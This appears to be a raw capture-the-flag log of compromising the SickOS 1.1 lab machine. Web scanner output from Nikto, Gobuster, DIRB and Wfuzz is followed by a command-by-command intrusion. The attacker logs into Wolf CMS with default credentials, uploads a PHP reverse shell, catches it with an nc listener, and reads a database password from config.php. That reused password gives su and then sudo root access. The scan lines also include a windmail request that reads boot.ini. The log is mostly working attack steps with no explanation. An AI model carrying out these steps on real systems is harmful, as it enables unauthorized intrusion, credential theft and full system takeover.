+ OSVDB-228: /cgi-exe/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-perl/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-127: /cgi/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /cgis/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /scripts/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-128: /cgibin/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-win/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-bin-sdb/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2717: /cgi-bin/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2717: /cgi-perl/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2735: /cgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /cgibin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /scripts/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /fcgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-279: /cgi-915/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgis/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-perl/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /fcgi-bin/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated:  2 error(s) and 589 item(s) reported on remote host
+ End Time:           2017-01-11 21:10:07 (GMT2) (246 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

SingleScan is testing URL: 'http://192.168.1.9:80/'
[19:18:55] [OUT] Inspecting URL 'http://192.168.1.9:80/'...

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.9:80/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wfuzz/wordlist/general/big.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Proxy        : http://192.168.1.9:3128/
[+] Expanded     : true
=====================================================
http://192.168.1.9:80/cgi-bin/ (Status: 403)
http://192.168.1.9:80/connect (Status: 200)
http://192.168.1.9:80/index (Status: 200)
=====================================================

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 21:18:58 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
PROXY: 192.168.1.9:3128

-----------------

GENERATED WORDS: 20458                                                      

---- Scanning URL: http://192.168.1.9:80/ ----
+ http://192.168.1.9:80/cgi-bin/ (CODE:403|SIZE:287)                                                                                                                                                            
+ http://192.168.1.9:80/connect (CODE:200|SIZE:109)                                                                                                                                                            
+ http://192.168.1.9:80/index (CODE:200|SIZE:21)                                                                                                                                                                
+ http://192.168.1.9:80/robots (CODE:200|SIZE:45)                                                                                                                                                              
+ http://192.168.1.9:80/robots.txt (CODE:200|SIZE:45)                                                                                                                                                          
+ http://192.168.1.9:80/server-status (CODE:403|SIZE:292)                                                                                                                                                      
                                                                                                                                                                                                               
-----------------
END_TIME: Wed Jan 11 21:19:13 2017
DOWNLOADED: 20458 - FOUND: 6
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.9:80
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request  
==================================================================


Fatal exception: FUZZ words and number of payloads do not match!

+ http://192.168.1.9:80/cgi-bin/

status
{ "uptime": " 02:28:29 up 2:37, 0 users, load average: 0.00, 0.01, 0.03", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

+ http://192.168.1.9:80/server-status
Forbidden

You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 192.168.1.9 Port 80

+ http://192.168.1.9:80/connect
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

http://192.168.1.9/index
<h1>
BLEHHH!!!
</h1>

http://192.168.1.9:80/robots
http://192.168.1.9/robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

http://192.168.1.9/wolfcms/

http://192.168.1.9/wolfcms/?/admin/login
admin:admin
Wolf CMS 0.8.2

Upload reverse shell
http://192.168.1.9/wolfcms/public/php-reverse-shell.php

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 45100
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 03:18:00 up  3:27,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@SickOs:/$


www-data@SickOs:/etc/apache2/sites-available$ cat default
cat default
<VirtualHost *:80>
ServerAdmin webmaster@localhost

DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>
www-data@SickOs:/etc/apache2/sites-available$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py
index.php
robots.txt
wolfcms
www-data@SickOs:/var/www$ cd wolfcms
cd wolfcms
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');


www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/var/www/wolfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
<lfcms$ python -c 'import pty; pty.spawn("/bin/sh")'                      
$ su sickos
su sickos
Password: john@123
sickos@SickOs:/var/www/wolfcms$ cd ~
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit

sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -la
ls -la
total 40
drwx------  3 root root 4096 Dec  6  2015 .
drwxr-xr-x 22 root root 4096 Sep 22  2015 ..
-rw-r--r--  1 root root   96 Dec  6  2015 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3724 Dec  6  2015 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep 22  2015 .cache
-rw-------  1 root root   22 Dec  5  2015 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5230 Dec  6  2015 .viminfo
root@SickOs:~# cat *.txt
cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


Regards,
Yuriy Stanchev/URIX